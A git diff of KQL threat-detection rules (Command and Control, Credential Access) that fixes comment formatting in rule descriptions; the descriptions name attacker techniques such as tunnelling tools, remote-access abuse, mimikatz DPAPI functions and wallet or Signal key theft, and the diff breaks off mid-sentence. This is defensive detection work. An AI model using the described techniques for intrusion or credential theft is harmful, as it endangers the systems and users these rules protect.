Control/network_connection_initiated_by_imewdbld_exe.kql b/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql index a482031b..3d8afe17 100644 --- a/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql +++ b/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql @@ -3,7 +3,6 @@ // Date: 2022-01-22 // Level: high // Description: Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1105 diff --git a/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql b/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql index 1a8a3a05..02cb3442 100644 --- a/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql +++ b/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql @@ -3,7 +3,6 @@ // Date: 2017-03-19 // Level: high // Description: Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1105 diff --git a/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql b/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql index 008d3ad0..084bc6b6 100644 --- a/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql +++ b/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql @@ -3,7 +3,6 @@ // Date: 2024-06-24 // Level: medium // Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1102, attack.t1102.001 diff --git a/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql b/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql index 60068ecd..e717d49b 100644 --- a/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql +++ b/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql @@ -3,8 +3,7 @@ // Date: 2022-08-17 // Level: high // Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. -In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected. - +// In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1102, attack.t1102.001 // False Positives: diff --git a/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql b/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql index 23c68aef..788bb520 100644 --- a/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql +++ b/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql @@ -3,8 +3,7 @@ // Date: 2024-06-03 // Level: medium // Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment. -Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky. - +// Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1090, attack.t1572 diff --git a/KQL/rules/Command and Control/pua_ngrok_execution.kql b/KQL/rules/Command and Control/pua_ngrok_execution.kql index 49f5032c..491b88e1 100644 --- a/KQL/rules/Command and Control/pua_ngrok_execution.kql +++ b/KQL/rules/Command and Control/pua_ngrok_execution.kql @@ -3,8 +3,7 @@ // Date: 2021-05-14 // Level: high // Description: Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. -Involved domains are bin.equinox.io for download and *.ngrok.io for connections. - +// Involved domains are bin.equinox.io for download and *.ngrok.io for connections. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1572 // False Positives: diff --git a/KQL/rules/Command and Control/quickassist_execution.kql b/KQL/rules/Command and Control/quickassist_execution.kql index 3cc1f417..5c5f13fb 100644 --- a/KQL/rules/Command and Control/quickassist_execution.kql +++ b/KQL/rules/Command and Control/quickassist_execution.kql @@ -3,7 +3,6 @@ // Date: 2024-12-19 // Level: low // Description: Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql index 1d75ae98..f84a0641 100644 --- a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql @@ -3,9 +3,8 @@ // Date: 2022-02-11 // Level: medium // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) - +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql index a8ad8d6d..2f688535 100644 --- a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql +++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql @@ -3,9 +3,8 @@ // Date: 2022-05-20 // Level: high // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) - +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql b/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql index 2bfbcc78..63cf323e 100644 --- a/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql @@ -3,9 +3,8 @@ // Date: 2022-02-13 // Level: medium // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) - +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql b/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql index 82465ebb..3a02dfc9 100644 --- a/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql @@ -3,9 +3,8 @@ // Date: 2022-02-11 // Level: medium // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) - +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql b/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql index a761d102..933328ab 100644 --- a/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql +++ b/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql @@ -3,8 +3,7 @@ // Date: 2024-09-22 // Level: medium // Description: Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. -MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes. - +// MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql b/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql index b361e753..f1128c2c 100644 --- a/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql @@ -3,9 +3,8 @@ // Date: 2022-09-25 // Level: medium // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) - +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql index fb076c21..4e947b67 100644 --- a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql +++ b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql @@ -3,9 +3,8 @@ // Date: 2025-05-19 // Level: medium // Description: Detects potential execution of MeshAgent which is a tool used for remote access. -Historical data shows that threat actors rename MeshAgent binary to evade detection. -Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access. - +// Historical data shows that threat actors rename MeshAgent binary to evade detection. +// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql index 1f6df197..2c038b27 100644 --- a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql +++ b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql @@ -3,9 +3,8 @@ // Date: 2025-05-19 // Level: medium // Description: Detects potential execution of MeshAgent which is a tool used for remote access. -Historical data shows that threat actors rename MeshAgent binary to evade detection. -Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access. - +// Historical data shows that threat actors rename MeshAgent binary to evade detection. +// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql index 81fbccc5..b2a13fc3 100644 --- a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql +++ b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql @@ -3,9 +3,8 @@ // Date: 2025-05-19 // Level: high // Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. -RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. -However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. - +// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. +// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql index c6254295..0adbbe6e 100644 --- a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql +++ b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql @@ -3,9 +3,8 @@ // Date: 2025-05-19 // Level: high // Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent. -RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. -However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. - +// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management. +// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003 diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql b/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql index 0a95d2e4..4b65c2ec 100644 --- a/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql @@ -3,9 +3,8 @@ // Date: 2022-02-13 // Level: medium // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) - +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql b/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql index 28c1bf37..78ef6bc3 100644 --- a/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql @@ -3,7 +3,6 @@ // Date: 2022-02-25 // Level: medium // Description: Detects potentially suspicious child processes launched via the ScreenConnect client service. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql b/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql index 222a5089..27d66443 100644 --- a/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql @@ -3,9 +3,8 @@ // Date: 2024-02-23 // Level: medium // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) - +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql b/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql index 22cd54bc..27505599 100644 --- a/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql +++ b/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql @@ -3,9 +3,8 @@ // Date: 2025-05-29 // Level: medium // Description: Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line. -These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID. -This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently. - +// These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID. +// This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219, attack.t1105 // False Positives: diff --git a/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql b/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql index f760057f..bf284ccc 100644 --- a/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql +++ b/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql @@ -3,9 +3,8 @@ // Date: 2022-09-25 // Level: medium // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) - +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql index 04f718e6..f1ca8a9d 100644 --- a/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql +++ b/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql @@ -3,7 +3,6 @@ // Date: 2023-10-25 // Level: high // Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control diff --git a/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql b/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql index ffd1f6af..056b4f88 100644 --- a/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql +++ b/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql @@ -3,9 +3,8 @@ // Date: 2022-02-13 // Level: medium // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) - +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: diff --git a/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql b/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql index f4cb275b..00da7605 100644 --- a/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql +++ b/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql @@ -3,9 +3,8 @@ // Date: 2022-09-28 // Level: high // Description: Detects AnyDesk writing binary files to disk other than "gcapi.dll". -According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, -which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details) - +// According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, +// which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details) // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 diff --git a/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql b/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql index a8c50100..34ab42d8 100644 --- a/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql +++ b/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql @@ -3,9 +3,8 @@ // Date: 2021-11-24 // Level: high // Description: Detects a suspicious CertReq execution downloading a file. -This behavior is often used by attackers to download additional payloads or configuration files. -Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes. - +// This behavior is often used by attackers to download additional payloads or configuration files. +// Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1105 // False Positives: diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql index 8bfd93fa..a919392d 100644 --- a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql +++ b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql @@ -3,7 +3,6 @@ // Date: 2023-05-01 // Level: medium // Description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet) - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1102 // False Positives: diff --git a/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql b/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql index b8ab8d3a..493f650f 100644 --- a/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql +++ b/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql @@ -3,8 +3,7 @@ // Date: 2022-09-02 // Level: high // Description: Detects a network connection initiated by the certutil.exe utility. -Attackers can abuse the utility in order to download malware or additional payloads. - +// Attackers can abuse the utility in order to download malware or additional payloads. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1105 diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql index d19487f5..a123605d 100644 --- a/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql +++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql @@ -3,7 +3,6 @@ // Date: 2023-10-25 // Level: medium // Description: Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature - // MITRE Tactic: Command and Control // Tags: attack.command-and-control diff --git a/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql index eb039042..0d746a56 100644 --- a/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql +++ b/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql @@ -3,8 +3,7 @@ // Date: 2024-07-29 // Level: medium // Description: Detects file access requests to crypto currency files by uncommon processes. -Could indicate potential attempt of crypto currency wallet stealing. - +// Could indicate potential attempt of crypto currency wallet stealing. // MITRE Tactic: Credential Access // Tags: attack.t1003, attack.credential-access // False Positives: diff --git a/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql index dd609165..8b6fa1cc 100644 --- a/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql +++ b/KQL/rules/Credential Access/access_to_windows_credential_history_file_by_uncommon_applications.kql @@ -3,8 +3,7 @@ // Date: 2022-10-17 // Level: medium // Description: Detects file access requests to the Windows Credential History File by an uncommon application. -This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function - +// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1555.004 diff --git a/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql index 60770bc3..542529f5 100644 --- a/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql +++ b/KQL/rules/Credential Access/access_to_windows_dpapi_master_keys_by_uncommon_applications.kql @@ -3,8 +3,7 @@ // Date: 2022-10-17 // Level: medium // Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. -This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function - +// This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1555.004 diff --git a/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql b/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql index f1da9f32..42a3ab11 100644 --- a/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql +++ b/KQL/rules/Credential Access/credential_manager_access_by_uncommon_applications.kql @@ -3,8 +3,7 @@ // Date: 2022-10-11 // Level: medium // Description: Detects suspicious processes based on name and location that access the windows credential manager and vault. -Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function - +// Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function // MITRE Tactic: Credential Access // Tags: attack.t1003, attack.credential-access // False Positives: diff --git a/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql b/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql index b6f4121e..886fe412 100644 --- a/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql +++ b/KQL/rules/Credential Access/dpapi_backup_keys_and_certificate_export_activity_ioc.kql @@ -3,7 +3,6 @@ // Date: 2024-06-26 // Level: high // Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates. - // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1555, attack.t1552.004 // False Positives: diff --git a/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql b/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql index 8a7da21a..f5d364c4 100644 --- a/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql +++ b/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql @@ -3,9 +3,8 @@ // Date: 2021-12-20 // Level: medium // Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials. -The Windows Registry stores configuration information that can be used by the system or other programs. -Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services - +// The Windows Registry stores configuration information that can be used by the system or other programs. +// Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services // MITRE Tactic: Credential Access // Tags: attack.credential-access, attack.t1552.002 diff --git a/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql b/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql index 392832e1..e7d9fa9d 100644 --- a/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql +++ b/KQL/rules/Credential Access/file_access_of_signal_desktop_sensitive_data.kql @@ -3,10 +3,9 @@ // Date: 2025-10-19 // Level: medium // Description: Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json. -The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data. -Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the users credentials. -Currently the rule only covers the default Signal installation path in AppData\Roaming. Signal Portable installations may use different paths based on user configuration. Additional paths can be added to the selection as needed. - +// The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the config.json contains the decryption key needed to access that data. +// Since the key is stored in plain text, a threat actor who gains access to both files can decrypt and read sensitive messages without needing the 